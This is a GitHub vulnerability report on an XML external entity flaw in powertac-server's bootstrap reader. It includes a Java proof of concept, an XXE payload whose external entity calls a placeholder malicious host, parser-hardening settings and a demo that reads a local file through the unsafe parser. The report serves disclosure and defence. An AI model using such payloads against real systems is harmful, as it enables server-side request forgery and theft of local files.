
Potential XXE (XML External Entity Injection) under BootstrapDataRepo.java readBootRecord function #1166

Open
JAckLosingHeart opened this issue Oct 22, 2024 · 0 comments


JAckLosingHeart commented Oct 22, 2024

Hi team,

Description:
An XXE vulnerability might be exploited when reading Bootstrap data from XML files.

The DocumentBuilderFactory instance here does not enable security settings or disable external entity loading, which leads to potential XXE exploitation if the URL, or the file behind the URL, is under the control of an attacker, leading to SSRF, information leaks and so on.

POC:

```java
import org.powertac.common.repo.BootstrapDataRepo;

import java.net.MalformedURLException;
import java.net.URL;

public class PowertacPoC {
    public static void main(String[] args) throws MalformedURLException {
        BootstrapDataRepo bootstrapDataRepo = new BootstrapDataRepo();
        // Attacker-controlled XML; the file carries a DOCTYPE with an external entity
        URL maliciousXMLURL = new URL("file:poc.xml");
        // readBootRecord parses the document with a default DocumentBuilderFactory,
        // so the external entity is resolved and the outbound request is made
        bootstrapDataRepo.readBootRecord(maliciousXMLURL);
    }
}
```

poc.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://replace.with.malicious.website">]>
<root>&xxe;</root>
```

And I can see the request come in on the other side (the malicious website).

Recommendation:
```java
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```

Or

```java
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```

Affected Component:
https://mvnrepository.com/artifact/org.powertac/server-interface <= 1.9.0
https://github.com/powertac/powertac-server <= powertac-server-1.9.0
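The following is an added, self-contained example (not code from the powertac-server project or from the reporter) that puts a default-configured DocumentBuilderFactory, standing in for the one the report describes in readBootRecord, next to the hardened configuration from the recommendation. Instead of calling out to a remote host it points the external entity at a temporary file it creates itself, so it runs offline and shows the local-file-read variant of the same bug. The class name XxeDemo, the method names parseUnsafe/parseSafe and the temp-file contents are assumptions made for illustration; it needs Java 11 or newer for Files.writeString.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import java.io.StringReader;
import java.nio.file.Files;
import java.nio.file.Path;

public class XxeDemo {

    // Hypothetical stand-in for the parser setup the report describes:
    // a factory with no security features set, so external entities are resolved.
    static Document parseUnsafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new InputSource(new StringReader(xml)));
    }

    // Hardened variant: refuse any DOCTYPE (which is where entities are declared),
    // and additionally switch off external general/parameter entities and XInclude
    // in case a DOCTYPE ever has to be allowed again.
    static Document parseSafe(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new InputSource(new StringReader(xml)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed "secret" file standing in for any local resource an attacker
        // would like to exfiltrate through the parser.
        Path secret = Files.createTempFile("xxe-secret", ".txt");
        Files.writeString(secret, "s3cr3t-from-disk");

        // Same shape as the reporter's poc.xml, but the entity points at the temp file.
        String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
                + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
                + "<root>&xxe;</root>";

        // Default factory: the entity is fetched and its content ends up in the DOM.
        Document doc = parseUnsafe(xml);
        System.out.println("unsafe parser read: " + doc.getDocumentElement().getTextContent());

        // Hardened factory: Xerces rejects the document at the DOCTYPE before
        // any entity is resolved, so no file read or outbound request happens.
        try {
            parseSafe(xml);
            System.out.println("safe parser accepted the document (not expected)");
        } catch (SAXParseException e) {
            System.out.println("safe parser rejected the document: " + e.getMessage());
        }

        Files.delete(secret);
    }
}
```

Disallowing the DOCTYPE declaration is the most robust of the recommended settings, because it removes the place where an external entity can be declared at all; an XML bootstrap record that genuinely needs a DTD should instead keep the DOCTYPE but leave the two external-entity features off.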
